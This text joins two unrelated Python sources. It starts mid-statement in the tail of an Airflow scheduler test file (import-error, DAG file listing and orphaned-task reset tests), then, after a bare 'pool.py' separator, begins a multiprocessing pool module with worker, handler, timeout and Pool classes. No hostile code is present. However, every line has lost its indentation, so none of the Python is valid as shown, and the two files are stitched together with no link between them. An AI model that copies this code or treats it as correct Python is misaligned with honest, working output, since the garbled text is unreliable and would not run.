"invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Remove the import error from the file
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(
PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
# Rerun the scheduler once the dag file has been removed
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
"""
[JIRA-1357] Test the 'list_py_file_paths' function used by the
scheduler to list and load DAGs.
"""
detected_files = set()
expected_files = set()
# No_dags is empty, _invalid_ is ignored by .airflowignore
ignored_files = [
'no_dags.py',
'test_invalid_cron.py',
'test_zip_invalid_cron.zip',
]
for file_name in os.listdir(TEST_DAGS_FOLDER):
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ignored_files:
expected_files.add(
'{}/{}'.format(TEST_DAGS_FOLDER, file_name))
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=False):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
example_dag_folder = airflow.example_dags.__path__[0]
for root, dirs, files in os.walk(example_dag_folder):
for file_name in files:
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ['__init__.py']:
expected_files.add(os.path.join(root, file_name))
detected_files.clear()
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=True):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
def test_reset_orphaned_tasks_nothing(self):
"""Try with nothing. """
scheduler = SchedulerJob()
session = settings.Session()
self.assertEqual(
0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_external_triggered_dag(self):
dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
dr1.state = State.RUNNING
ti.state = State.SCHEDULED
dr1.external_trigger = True
session.merge(ti)
session.merge(dr1)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
self.assertEqual(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
dag_id = 'test_reset_orphaned_tasks_backfill_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
ti.state = State.SCHEDULED
dr1.state = State.RUNNING
dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
session.merge(ti)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
# make two dagruns, only reset for one
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
dr2.state = State.RUNNING
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
self.assertEqual(1, len(reset_tis))
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(State.SCHEDULED, ti1.state)
self.assertEqual(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
"""Make sure a task in an orphaned state is not reset if it has no dagrun. """
dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
session.add(ti)
session.commit()
ti.refresh_from_db()
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
dag_id = 'test_reset_orphaned_tasks_no_orphans'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
tis = dr1.get_task_instances(session=session)
tis[0].state = State.RUNNING
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
tis[0].refresh_from_db()
self.assertEqual(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
"""Ensure orphaned tasks with non-running dagruns are not reset."""
dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
tis = dr1.get_task_instances(session=session)
self.assertEqual(1, len(tis))
tis[0].state = State.SCHEDULED
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
"""Create dagruns and esnure only ones with correct states are reset."""
prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
dag = DAG(dag_id=prefix,
start_date=DEFAULT_DATE,
schedule_interval="@daily")
tasks = []
for i in range(len(states)):
task_id = "{}_task_{}".format(prefix, i)
task = DummyOperator(task_id=task_id, dag=dag)
tasks.append(task)
scheduler = SchedulerJob()
session = settings.Session()
# create dagruns
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
dr2.state = State.SUCCESS
session.merge(dr1)
session.merge(dr2)
session.commit()
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
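# Only the QUEUED and SCHEDULED task instances on the RUNNING dagrun
# count as orphans to reset; the NONE state is already empty and the
# SUCCESS dagrun is left untouched.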
self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
self.assertIsNone(ti.state)
else:
self.assertEqual(state, ti.state)
# otherwise not
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
session.close()
|
pool.py
|
# -*- coding: utf-8 -*-
#
# Module providing the `Pool` class for managing a process pool
#
# multiprocessing/pool.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
#
# Imports
#
import errno
import itertools
import os
import platform
import signal
import sys
import threading
import time
import warnings
from collections import deque
from functools import partial
from . import cpu_count, get_context
from . import util
from .common import (
TERM_SIGNAL, human_status, pickle_loads, reset_signals, restart_state,
)
from .compat import get_errno, send_offset
from .einfo import ExceptionInfo
from .dummy import DummyProcess
from .exceptions import (
CoroStop,
RestartFreqExceeded,
SoftTimeLimitExceeded,
Terminated,
TimeLimitExceeded,
TimeoutError,
WorkerLostError,
)
from .five import Empty, Queue, range, values, reraise, monotonic
from .util import Finalize, debug
MAXMEM_USED_FMT = """\
child process exiting after exceeding memory limit ({0}KiB / {1}KiB)
"""
try:
import resource
except ImportError: # pragma: no cover
resource = None # noqa
PY3 = sys.version_info[0] == 3
if platform.system() == 'Windows': # pragma: no cover
# On Windows os.kill calls TerminateProcess which cannot be
# handled by any process, so this is needed to terminate the task
# *and its children* (if any).
from ._win import kill_processtree as _kill # noqa
SIGKILL = TERM_SIGNAL
else:
from os import kill as _kill # noqa
SIGKILL = signal.SIGKILL
try:
TIMEOUT_MAX = threading.TIMEOUT_MAX
except AttributeError: # pragma: no cover
TIMEOUT_MAX = 1e10 # noqa
if sys.version_info >= (3, 3):
_Semaphore = threading.Semaphore
else:
# Semaphore is a factory function pointing to _Semaphore
_Semaphore = threading._Semaphore # noqa
#
# Constants representing the state of a pool
#
RUN = 0
CLOSE = 1
TERMINATE = 2
#
# Constants representing the state of a job
#
ACK = 0
READY = 1
TASK = 2
NACK = 3
DEATH = 4
#
# Exit code constants
#
EX_OK = 0
EX_FAILURE = 1
EX_RECYCLE = 0x9B
# Signal used for soft time limits.
SIG_SOFT_TIMEOUT = getattr(signal, "SIGUSR1", None)
#
# Miscellaneous
#
LOST_WORKER_TIMEOUT = 10.0
EX_OK = getattr(os, "EX_OK", 0)
job_counter = itertools.count()
Lock = threading.Lock
def _get_send_offset(connection):
try:
native = connection.send_offset
except AttributeError:
native = None
if native is None:
return partial(send_offset, connection.fileno())
return native
def mapstar(args):
return list(map(*args))
def starmapstar(args):
return list(itertools.starmap(args[0], args[1]))
def error(msg, *args, **kwargs):
if util._logger:
util._logger.error(msg, *args, **kwargs)
def stop_if_not_current(thread, timeout=None):
if thread is not threading.current_thread():
thread.stop(timeout)
class LaxBoundedSemaphore(_Semaphore):
"""Semaphore that checks that # release is <= # acquires,
but ignores if # releases >= value."""
def shrink(self):
self._initial_value -= 1
self.acquire()
if PY3:
def __init__(self, value=1, verbose=None):
_Semaphore.__init__(self, value)
self._initial_value = value
def grow(self):
with self._cond:
self._initial_value += 1
self._value += 1
self._cond.notify()
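# release() only increments the counter while it is below the initial
# value, which is what makes the semaphore 'lax': surplus releases are
# silently ignored.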
def release(self):
cond = self._cond
with cond:
if self._value < self._initial_value:
self._value += 1
cond.notify_all()
def clear(self):
while self._value < self._initial_value:
_Semaphore.release(self)
else:
def __init__(self, value=1, verbose=None):
_Semaphore.__init__(self, value, verbose)
self._initial_value = value
def grow(self):
cond = self._Semaphore__cond
with cond:
self._initial_value += 1
self._Semaphore__value += 1
cond.notify()
def release(self): # noqa
cond = self._Semaphore__cond
with cond:
if self._Semaphore__value < self._initial_value:
self._Semaphore__value += 1
cond.notifyAll()
def clear(self): # noqa
while self._Semaphore__value < self._initial_value:
_Semaphore.release(self)
#
# Exceptions
#
class MaybeEncodingError(Exception):
"""Wraps possible unpickleable errors, so they can be
safely sent through the socket."""
def __init__(self, exc, value):
self.exc = repr(exc)
self.value = repr(value)
super(MaybeEncodingError, self).__init__(self.exc, self.value)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, str(self))
def __str__(self):
return "Error sending result: '%r'. Reason: '%r'." % (
self.value, self.exc)
class WorkersJoined(Exception):
"""All workers have terminated."""
def soft_timeout_sighandler(signum, frame):
raise SoftTimeLimitExceeded()
#
# Code run by worker processes
#
class Worker(object):
def __init__(self, inq, outq, synq=None, initializer=None, initargs=(),
maxtasks=None, sentinel=None, on_exit=None,
sigprotection=True, wrap_exception=True,
max_memory_per_child=None):
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
self.initializer = initializer
self.initargs = initargs
self.maxtasks = maxtasks
self.max_memory_per_child = max_memory_per_child
self._shutdown = sentinel
self.on_exit = on_exit
self.sigprotection = sigprotection
self.inq, self.outq, self.synq = inq, outq, synq
self.wrap_exception = wrap_exception # XXX cannot disable yet
self.contribute_to_object(self)
def contribute_to_object(self, obj):
obj.inq, obj.outq, obj.synq = self.inq, self.outq, self.synq
obj.inqW_fd = self.inq._writer.fileno() # inqueue write fd
obj.outqR_fd = self.outq._reader.fileno() # outqueue read fd
if self.synq:
obj.synqR_fd = self.synq._reader.fileno() # synqueue read fd
obj.synqW_fd = self.synq._writer.fileno() # synqueue write fd
obj.send_syn_offset = _get_send_offset(self.synq._writer)
else:
obj.synqR_fd = obj.synqW_fd = obj._send_syn_offset = None
obj._quick_put = self.inq._writer.send
obj._quick_get = self.outq._reader.recv
obj.send_job_offset = _get_send_offset(self.inq._writer)
return obj
def __reduce__(self):
return self.__class__, (
self.inq, self.outq, self.synq, self.initializer,
self.initargs, self.maxtasks, self._shutdown, self.on_exit,
self.sigprotection, self.wrap_exception,
)
def __call__(self):
_exit = sys.exit
_exitcode = [None]
def exit(status=None):
_exitcode[0] = status
return _exit()
sys.exit = exit
pid = os.getpid()
self._make_child_methods()
self.after_fork()
self.on_loop_start(pid=pid) # callback on loop start
try:
sys.exit(self.workloop(pid=pid))
except Exception as exc:
error('Pool process %r error: %r', self, exc, exc_info=1)
self._do_exit(pid, _exitcode[0], exc)
finally:
self._do_exit(pid, _exitcode[0], None)
def _do_exit(self, pid, exitcode, exc=None):
if exitcode is None:
exitcode = EX_FAILURE if exc else EX_OK
if self.on_exit is not None:
self.on_exit(pid, exitcode)
if sys.platform != 'win32':
try:
self.outq.put((DEATH, (pid, exitcode)))
time.sleep(1)
finally:
os._exit(exitcode)
else:
os._exit(exitcode)
def on_loop_start(self, pid):
pass
def prepare_result(self, result):
return result
def workloop(self, debug=debug, now=monotonic, pid=None):
pid = pid or os.getpid()
put = self.outq.put
inqW_fd = self.inqW_fd
synqW_fd = self.synqW_fd
maxtasks = self.maxtasks
max_memory_per_child = self.max_memory_per_child or 0
prepare_result = self.prepare_result
getrusage = getattr(resource, 'getrusage', None)
rusage_self = getattr(resource, 'RUSAGE_SELF', None)
wait_for_job = self.wait_for_job
_wait_for_syn = self.wait_for_syn
def wait_for_syn(jid):
i = 0
while 1:
if i > 60:
error('!!!WAIT FOR ACK TIMEOUT: job:%r fd:%r!!!',
jid, self.synq._reader.fileno(), exc_info=1)
req = _wait_for_syn()
if req:
type_, args = req
if type_ == NACK:
return False
assert type_ == ACK
return True
i += 1
completed = 0
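# Main worker loop: receive a TASK message, ACK it back to the pool,
# optionally wait for a SYN confirmation, run the job and put a READY
# result (or ExceptionInfo) on the outqueue.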
while maxtasks is None or (maxtasks and completed < maxtasks):
req = wait_for_job()
if req:
type_, args_ = req
assert type_ == TASK
job, i, fun, args, kwargs = args_
put((ACK, (job, i, now(), pid, synqW_fd)))
if _wait_for_syn:
confirm = wait_for_syn(job)
if not confirm:
continue # received NACK
try:
result = (True, prepare_result(fun(*args, **kwargs)))
except Exception:
result = (False, ExceptionInfo())
try:
put((READY, (job, i, result, inqW_fd)))
except Exception as exc:
_, _, tb = sys.exc_info()
try:
wrapped = MaybeEncodingError(exc, result[1])
einfo = ExceptionInfo((
MaybeEncodingError, wrapped, tb,
))
put((READY, (job, i, (False, einfo), inqW_fd)))
finally:
del(tb)
completed += 1
if max_memory_per_child > 0:
used_kb = getrusage(rusage_self).ru_maxrss
if used_kb <= 0:
error('worker unable to determine memory usage')
if used_kb > 0 and used_kb > max_memory_per_child:
error(MAXMEM_USED_FMT.format(
used_kb, max_memory_per_child))
return EX_RECYCLE
else:
error('worker unable to determine worker memory usage')
debug('worker exiting after %d tasks', completed)
if maxtasks:
return EX_RECYCLE if completed == maxtasks else EX_FAILURE
return EX_OK
def after_fork(self):
if hasattr(self.inq, '_writer'):
self.inq._writer.close()
if hasattr(self.outq, '_reader'):
self.outq._reader.close()
if self.initializer is not None:
self.initializer(*self.initargs)
# Make sure all exiting signals call finally: blocks.
# This is important for the semaphore to be released.
reset_signals(full=self.sigprotection)
# install signal handler for soft timeouts.
if SIG_SOFT_TIMEOUT is not None:
signal.signal(SIG_SOFT_TIMEOUT, soft_timeout_sighandler)
try:
signal.signal(signal.SIGINT, signal.SIG_IGN)
except AttributeError:
pass
def _make_recv_method(self, conn):
get = conn.get
if hasattr(conn, '_reader'):
_poll = conn._reader.poll
if hasattr(conn, 'get_payload') and conn.get_payload:
get_payload = conn.get_payload
def _recv(timeout, loads=pickle_loads):
return True, loads(get_payload())
else:
def _recv(timeout): # noqa
if _poll(timeout):
return True, get()
return False, None
else:
def _recv(timeout): # noqa
try:
return True, get(timeout=timeout)
except Queue.Empty:
return False, None
return _recv
def _make_child_methods(self, loads=pickle_loads):
self.wait_for_job = self._make_protected_receive(self.inq)
self.wait_for_syn = (self._make_protected_receive(self.synq)
if self.synq else None)
def _make_protected_receive(self, conn):
_receive = self._make_recv_method(conn)
should_shutdown = self._shutdown.is_set if self._shutdown else None
def receive(debug=debug):
if should_shutdown and should_shutdown():
debug('worker got sentinel -- exiting')
raise SystemExit(EX_OK)
try:
ready, req = _receive(1.0)
if not ready:
return None
except (EOFError, IOError) as exc:
if get_errno(exc) == errno.EINTR:
return None # interrupted, maybe by gdb
debug('worker got %s -- exiting', type(exc).__name__)
raise SystemExit(EX_FAILURE)
if req is None:
debug('worker got sentinel -- exiting')
raise SystemExit(EX_FAILURE)
return req
return receive
#
# Class representing a process pool
#
class PoolThread(DummyProcess):
def __init__(self, *args, **kwargs):
DummyProcess.__init__(self)
self._state = RUN
self._was_started = False
self.daemon = True
def run(self):
try:
return self.body()
except RestartFreqExceeded as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
_kill(os.getpid(), TERM_SIGNAL)
sys.exit()
except Exception as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
os._exit(1)
def start(self, *args, **kwargs):
self._was_started = True
super(PoolThread, self).start(*args, **kwargs)
def on_stop_not_started(self):
pass
def stop(self, timeout=None):
if self._was_started:
self.join(timeout)
return
self.on_stop_not_started()
def terminate(self):
self._state = TERMINATE
def close(self):
self._state = CLOSE
class Supervisor(PoolThread):
def __init__(self, pool):
self.pool = pool
super(Supervisor, self).__init__()
def body(self):
debug('worker handler starting')
time.sleep(0.8)
pool = self.pool
try:
# do a burst at startup to verify that we can start
# our pool processes, and in that time we lower
# the max restart frequency.
prev_state = pool.restart_state
pool.restart_state = restart_state(10 * pool._processes, 1)
for _ in range(10):
if self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.1)
# Keep maintaining workers until the cache gets drained, unless
# the pool is terminated
pool.restart_state = prev_state
while self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.8)
except RestartFreqExceeded:
pool.close()
pool.join()
raise
debug('worker handler exiting')
class TaskHandler(PoolThread):
def __init__(self, taskqueue, put, outqueue, pool, cache):
self.taskqueue = taskqueue
self.put = put
self.outqueue = outqueue
self.pool = pool
self.cache = cache
super(TaskHandler, self).__init__()
def body(self):
cache = self.cache
taskqueue = self.taskqueue
put = self.put
for taskseq, set_length in iter(taskqueue.get, None):
task = None
i = -1
try:
for i, task in enumerate(taskseq):
if self._state:
debug('task handler found thread._state != RUN')
break
try:
put(task)
except IOError:
debug('could not put task on queue')
break
except Exception:
job, ind = task[:2]
try:
cache[job]._set(ind, (False, ExceptionInfo()))
except KeyError:
pass
else:
if set_length:
debug('doing set_length()')
set_length(i + 1)
continue
break
except Exception:
job, ind = task[:2] if task else (0, 0)
if job in cache:
cache[job]._set(ind + 1, (False, ExceptionInfo()))
if set_length:
util.debug('doing set_length()')
set_length(i + 1)
else:
debug('task handler got sentinel')
self.tell_others()
def tell_others(self):
outqueue = self.outqueue
put = self.put
pool = self.pool
try:
# tell result handler to finish when cache is empty
debug('task handler sending sentinel to result handler')
outqueue.put(None)
# tell workers there is no more work
debug('task handler sending sentinel to workers')
for p in pool:
put(None)
except IOError:
debug('task handler got IOError when sending sentinels')
debug('task handler exiting')
def on_stop_not_started(self):
self.tell_others()
class TimeoutHandler(PoolThread):
def __init__(self, processes, cache, t_soft, t_hard):
self.processes = processes
self.cache = cache
self.t_soft = t_soft
self.t_hard = t_hard
self._it = None
super(TimeoutHandler, self).__init__()
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self.processes)
if proc.pid == pid
), (None, None))
def on_soft_timeout(self, job):
debug('soft time limit exceeded for %r', job)
process, _index = self._process_by_pid(job._worker_pid)
if not process:
return
# Run timeout callback
job.handle_timeout(soft=True)
try:
_kill(job._worker_pid, SIG_SOFT_TIMEOUT)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
def on_hard_timeout(self, job):
if job.ready():
return
debug('hard time limit exceeded for %r', job)
# Remove from cache and set return value to an exception
try:
raise TimeLimitExceeded(job._timeout)
except TimeLimitExceeded:
job._set(job._job, (False, ExceptionInfo()))
else: # pragma: no cover
pass
# Remove from _pool
process, _index = self._process_by_pid(job._worker_pid)
# Run timeout callback
job.handle_timeout(soft=False)
if process:
self._trywaitkill(process)
def _trywaitkill(self, worker):
debug('timeout: sending TERM to %s', worker._name)
try:
worker.terminate()
except OSError:
pass
else:
if worker._popen.wait(timeout=0.1):
return
debug('timeout: TERM timed-out, now sending KILL to %s', worker._name)
try:
_kill(worker.pid, SIGKILL)
except OSError:
pass
def handle_timeouts(self):
cache = self.cache
t_hard, t_soft = self.t_hard, self.t_soft
dirty = set()
on_soft_timeout = self.on_soft_timeout
on_hard_timeout = self.on_hard_timeout
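# A job counts as timed out once the given number of seconds has
# elapsed since the worker ACKed it (job._time_accepted).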
def _timed_out(start, timeout):
if not start or not timeout:
return False
if monotonic() >= start + timeout:
return True
# Inner-loop
while self._state == RUN:
# Remove dirty items not in cache anymore
if dirty:
dirty = set(k for k in dirty if k in cache)
for i, job in list(cache.items()):
ack_time = job._time_accepted
soft_timeout = job._soft_timeout
if soft_timeout is None:
soft_timeout = t_soft
hard_timeout = job._timeout
if hard_timeout is None:
hard_timeout = t_hard
if _timed_out(ack_time, hard_timeout):
on_hard_timeout(job)
elif i not in dirty and _timed_out(ack_time, soft_timeout):
on_soft_timeout(job)
dirty.add(i)
yield
def body(self):
while self._state == RUN:
try:
for _ in self.handle_timeouts():
time.sleep(1.0) # don't spin
except CoroStop:
break
debug('timeout handler exiting')
def handle_event(self, *args):
if self._it is None:
self._it = self.handle_timeouts()
try:
next(self._it)
except StopIteration:
self._it = None
class ResultHandler(PoolThread):
def __init__(self, outqueue, get, cache, poll,
join_exited_workers, putlock, restart_state,
check_timeouts, on_job_ready):
self.outqueue = outqueue
self.get = get
self.cache = cache
self.poll = poll
self.join_exited_workers = join_exited_workers
self.putlock = putlock
self.restart_state = restart_state
self._it = None
self._shutdown_complete = False
self.check_timeouts = check_timeouts
self.on_job_ready = on_job_ready
self._make_methods()
super(ResultHandler, self).__init__()
def on_stop_not_started(self):
# used when pool started without result handler thread.
self.finish_at_shutdown(handle_timeouts=True)
def _make_methods(self):
cache = self.cache
putlock = self.putlock
restart_state = self.restart_state
on_job_ready = self.on_job_ready
def on_ack(job, i, time_accepted, pid, synqW_fd):
restart_state.R = 0
try:
cache[job]._ack(i, time_accepted, pid, synqW_fd)
except (KeyError, AttributeError):
# Object gone or doesn't support _ack (e.g. IMAPIterator).
pass
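# on_ready delivers a finished result to the cached job and, if the job
# is not yet complete, releases the putlock so another task may be
# scheduled.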
def on_ready(job, i, obj, inqW_fd):
if on_job_ready is not None:
on_job_ready(job, i, obj, inqW_fd)
try:
item = cache[job]
except KeyError:
return
if not item.ready():
if putlock is not None:
putlock.release()
try:
item._set(i, obj)
except KeyError:
pass
def on_death(pid, exitcode):
try:
os.kill(pid, TERM_SIGNAL)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
state_handlers = self.state_handlers = {
ACK: on_ack, READY: on_ready, DEATH: on_death
}
def on_state_change(task):
state, args = task
try:
state_handlers[state](*args)
except KeyError:
debug("Unknown job state: %s (args=%s)", state, args)
self.on_state_change = on_state_change
def _process_result(self, timeout=1.0):
poll = self.poll
on_state_change = self.on_state_change
while 1:
try:
ready, task = poll(timeout)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
raise CoroStop()
if self._state:
assert self._state == TERMINATE
debug('result handler found thread._state=TERMINATE')
raise CoroStop()
if ready:
if task is None:
debug('result handler got sentinel')
raise CoroStop()
on_state_change(task)
if timeout != 0: # blocking
break
else:
break
yield
def handle_event(self, fileno=None, events=None):
if self._state == RUN:
if self._it is None:
self._it = self._process_result(0) # non-blocking
try:
next(self._it)
except (StopIteration, CoroStop):
self._it = None
def body(self):
debug('result handler starting')
try:
while self._state == RUN:
try:
for _ in self._process_result(1.0): # blocking
pass
except CoroStop:
break
finally:
self.finish_at_shutdown()
def finish_at_shutdown(self, handle_timeouts=False):
self._shutdown_complete = True
get = self.get
outqueue = self.outqueue
cache = self.cache
poll = self.poll
join_exited_workers = self.join_exited_workers
check_timeouts = self.check_timeouts
on_state_change = self.on_state_change
time_terminate = None
while cache and self._state != TERMINATE:
if check_timeouts is not None:
check_timeouts()
try:
ready, task = poll(1.0)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
return
if ready:
if task is None:
debug('result handler ignoring extra sentinel')
continue
on_state_change(task)
try:
join_exited_workers(shutdown=True)
except WorkersJoined:
now = monotonic()
if not time_terminate:
time_terminate = now
else:
if now - time_terminate > 5.0:
debug('result handler exiting: timed out')
break
debug('result handler: all workers terminated, '
'timeout in %ss',
abs(min(now - time_terminate - 5.0, 0)))
if hasattr(outqueue, '_reader'):
debug('ensuring that outqueue is not full')
# If we don't make room available in outqueue then
# attempts to add the sentinel (None) to outqueue may
# block. There is guaranteed to be no more than 2 sentinels.
try:
for i in range(10):
if not outqueue._reader.poll():
break
get()
except (IOError, EOFError):
pass
debug('result handler exiting: len(cache)=%s, thread._state=%s',
len(cache), self._state)
class Pool(object):
'''
Class which supports an async version of applying functions to arguments.
'''
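# A minimal usage sketch (not part of the original module; assumes this
# class is importable, e.g. ``from billiard.pool import Pool``, and that
# ``square`` is defined at module level so it can be pickled):
#
#     def square(x):
#         return x * x
#
#     with Pool(processes=4) as pool:              # __exit__ terminates the pool
#         res = pool.apply_async(square, (7,))     # returns an ApplyResult
#         print(res.get(timeout=10))               # -> 49
#         print(pool.map(square, range(5)))        # -> [0, 1, 4, 9, 16]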
_wrap_exception = True
Worker = Worker
Supervisor = Supervisor
TaskHandler = TaskHandler
TimeoutHandler = TimeoutHandler
ResultHandler = ResultHandler
SoftTimeLimitExceeded = SoftTimeLimitExceeded
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, timeout=None, soft_timeout=None,
lost_worker_timeout=None,
max_restarts=None, max_restart_freq=1,
on_process_up=None,
on_process_down=None,
on_timeout_set=None,
on_timeout_cancel=None,
threads=True,
semaphore=None,
putlocks=False,
allow_restart=False,
synack=False,
on_process_exit=None,
context=None,
max_memory_per_child=None,
enable_timeouts=False,
**kwargs):
self._ctx = context or get_context()
self.synack = synack
self._setup_queues()
self._taskqueue = Queue()
self._cache = {}
self._state = RUN
self.timeout = timeout
self.soft_timeout = soft_timeout
self._maxtasksperchild = maxtasksperchild
self._max_memory_per_child = max_memory_per_child
self._initializer = initializer
self._initargs = initargs
self._on_process_exit = on_process_exit
self.lost_worker_timeout = lost_worker_timeout or LOST_WORKER_TIMEOUT
self.on_process_up = on_process_up
self.on_process_down = on_process_down
self.on_timeout_set = on_timeout_set
self.on_timeout_cancel = on_timeout_cancel
self.threads = threads
self.readers = {}
self.allow_restart = allow_restart
self.enable_timeouts = bool(
enable_timeouts or
self.timeout is not None or
self.soft_timeout is not None
)
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
self._processes = self.cpu_count() if processes is None else processes
self.max_restarts = max_restarts or round(self._processes * 100)
self.restart_state = restart_state(max_restarts, max_restart_freq or 1)
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
if on_process_exit is not None and not callable(on_process_exit):
raise TypeError('on_process_exit must be callable')
class Process(self._ctx.Process):
_controlled_termination = False
def terminate_controlled(self):
self._controlled_termination = True
self.terminate()
self._Process = Process
self._pool = []
self._poolctrl = {}
